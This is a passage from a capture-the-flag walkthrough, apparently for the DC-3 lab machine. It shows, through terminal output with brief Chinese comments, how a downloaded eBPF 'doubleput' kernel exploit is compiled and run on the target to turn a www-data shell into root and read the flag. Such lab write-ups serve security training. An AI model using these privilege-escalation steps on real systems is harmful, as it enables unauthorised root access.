39772.zip                    100%[==============================================>]   6.86K  28.0KB/s    in 0.2s    

2023-07-10 23:39:43 (28.0 KB/s) - ‘39772.zip’ saved [7025/7025]


┌──(kali㉿kali)-[~/Downloads/dc_3]
└─$ unzip 39772.zip                           
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar

┌──(kali㉿kali)-[~/Downloads/dc_3/39772]
└─$ tar xvf exploit.tar 
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c

将文件依次上传到靶机，给予 sh 文件运行权限

www-data@DC-3:/tmp$ chmod +x compile.sh
chmod +x compile.sh
www-data@DC-3:/tmp$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp$ ls -laih
ls -laih
total 188K
 1592 drwxrwxrwt  8 root     root     4.0K Jul 11 13:46 .
    2 drwxr-xr-x 22 root     root     4.0K Mar 23  2019 ..
63123 drwxrwxrwt  2 root     root     4.0K Jul 11 12:22 .ICE-unix
63126 drwxrwxrwt  2 root     root     4.0K Jul 11 12:22 .Test-unix
63122 drwxrwxrwt  2 root     root     4.0K Jul 11 12:22 .X11-unix
63124 drwxrwxrwt  2 root     root     4.0K Jul 11 12:22 .XIM-unix
63125 drwxrwxrwt  2 root     root     4.0K Jul 11 12:22 .font-unix
 2193 -rw-r--r--  1 www-data www-data 6.0K Jul 11 13:16 40049.c
 2192 -rw-r--r--  1 www-data www-data  16K Jul 11 13:11 41458.c
 8618 -rwxr-xr-x  1 www-data www-data  23K Jul 11 13:25 chocobo_root
 7188 -rw-r--r--  1 www-data www-data  25K Jul 11 13:24 chocobo_root.c
 7189 -rwxr-xr-x  1 www-data www-data  155 Jul 11 13:44 compile.sh
  725 -rw-r--r--  1 www-data www-data 2.9K Jul 11 12:12 dirtyc0w.c
 8703 -rwxr-xr-x  1 www-data www-data  13K Jul 11 13:46 doubleput
 7199 -rw-r--r--  1 www-data www-data 4.1K Jul 11 13:44 doubleput.c
 2178 -r-----r--  1 www-data www-data    5 Jul 11 13:08 foo
 8699 -rwxr-xr-x  1 www-data www-data 7.9K Jul 11 13:46 hello
 7204 -rw-r--r--  1 www-data www-data 2.2K Jul 11 13:44 hello.c
 8565 -rwxr-xr-x  1 www-data www-data  18K Jul 11 13:12 pwn
 8704 -rwxr-xr-x  1 www-data www-data 7.4K Jul 11 13:46 suidhelper
 8406 -rw-r--r--  1 www-data www-data  255 Jul 11 13:44 suidhelper.c
63265 drwx------  3 root     root     4.0K Jul 11 12:22 systemd-private-e1ed860c30e54788a139a4c5d9493034-systemd-timesyncd.service-QrMQ7U

虽然有 warning，但是并不妨碍我们得到可执行文件，执行后提权成功

www-data@DC-3:/tmp$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!